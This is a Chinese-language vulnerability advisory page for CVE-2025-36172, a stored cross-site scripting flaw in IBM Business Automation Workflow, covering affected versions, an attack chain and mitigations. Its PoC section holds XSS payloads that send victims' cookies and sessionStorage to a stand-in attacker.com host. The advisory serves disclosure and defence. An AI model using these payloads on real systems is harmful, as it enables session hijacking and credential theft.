IPBUF安全漏洞报告
English
CVE-2025-36172 CVSS 6.4 中危

CVE-2025-36172 IBM Business Automation Workflow存储型XSS漏洞

披露日期: 2025-11-03
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-36172
漏洞类型
存储型跨站脚本(XSS)
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
IBM Cloud Pak for Business Automation, IBM Business Automation Workflow

相关标签

存储型XSS跨站脚本IBM Business Automation WorkflowIBM Cloud PakCVE-2025-36172Web应用安全会话劫持

漏洞概述

CVE-2025-36172是IBM Business Automation Workflow中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响IBM Cloud Pak for Business Automation多个版本(25.0.0至25.0.0 Interim Fix 001、24.0.1至24.0.1 Interim Fix 004、24.0.0至24.0.0 Interim Fix 006)及更早不受支持的版本。攻击者利用该漏洞可以在Web UI中注入任意JavaScript代码,从而改变应用程序的预期功能。攻击成功后,攻击者可能在受信任的会话中窃取用户凭据、劫持用户会话或执行其他恶意操作。由于是存储型XSS,恶意脚本会被永久保存在服务器端,所有访问受影响页面的用户都会受到攻击影响。该漏洞需要低权限认证用户即可实施攻击,无需目标用户交互即可触发。

技术细节

该漏洞是存储型跨站脚本(CWE-79)问题,存在于IBM Business Automation Workflow的Web界面处理用户输入的过程中。攻击者作为经过身份验证的低权限用户,可以在用户资料、备注、描述等文本输入字段中嵌入恶意JavaScript代码。由于应用程序缺乏对用户输入的充分验证和输出编码,恶意代码会被存储在服务器数据库中。当其他用户访问包含该恶意内容的页面时,浏览器会将其解析为可执行脚本。攻击者可以利用此漏洞绕过同源策略限制,窃取受害者的会话Cookie、劫持用户会话、修改页面内容显示钓鱼信息,或在受害者权限范围内执行操作。由于该漏洞影响Web UI的所有访问者,因此具有较大的危害面。攻击者通常通过寻找未对特殊字符进行过滤的输入点来实施攻击。

攻击链分析

STEP 1
Reconnaissance
攻击者收集目标系统信息,确认版本是否在受影响范围内
STEP 2
Authentication
攻击者使用低权限账号登录IBM Business Automation Workflow系统
STEP 3
Payload Injection
攻击者在用户资料、备注或描述等文本输入字段中注入恶意JavaScript代码
STEP 4
Data Persistence
恶意脚本被存储在服务器数据库中,等待其他用户访问
STEP 5
Exploitation Trigger
受害者访问包含恶意内容的页面,浏览器执行注入的JavaScript代码
STEP 6
Impact Execution
攻击者成功窃取会话Cookie、凭据或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2025-36172 Stored XSS PoC --> <!-- This PoC demonstrates the stored XSS vulnerability in IBM Business Automation Workflow --> <!-- Target: IBM Cloud Pak for Business Automation / Business Automation Workflow --> <!-- Step 1: Identify a text input field in the application (e.g., user profile, notes, description) --> <!-- Step 2: Inject the following payload in the identified field --> <script> // Steal session cookies document.write('<img src="https://attacker.com/log?cookie=' + document.cookie + '"/>'); // Or perform actions on behalf of the user // Fetch internal data and exfiltrate fetch('https://attacker.com/exfil?data=' + btoa(JSON.stringify(sessionStorage))); </script> <!-- Alternative payload using event handlers --> <img src=x onerror="fetch('https://attacker.com/log?data='+document.cookie)"> <!-- For demonstration purposes - actual exploitation requires: --> <!-- 1. Valid low-privilege credentials --> <!-- 2. Access to a writeable text field --> <!-- 3. Victim visits the page containing the malicious script -->

影响范围

IBM Cloud Pak for Business Automation 25.0.0 至 25.0.0 Interim Fix 001
IBM Cloud Pak for Business Automation 24.0.1 至 24.0.1 Interim Fix 004
IBM Cloud Pak for Business Automation 24.0.0 至 24.0.0 Interim Fix 006
IBM Business Automation Workflow 所有更早不受支持的版本

防御指南

临时缓解措施
如果无法立即应用官方补丁,可以采取以下临时缓解措施:1)限制用户输入字段的内容长度和允许的字符类型;2)实施严格的输入验证规则,过滤或转义<、>、'、"等特殊字符;3)配置Web应用防火墙(WAF)规则检测和阻止XSS攻击向量;4)启用Content-Security-Policy限制脚本来源;5)监控应用日志关注异常的脚本注入尝试。但最根本的解决方案仍然是尽快应用IBM官方发布的安全更新。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表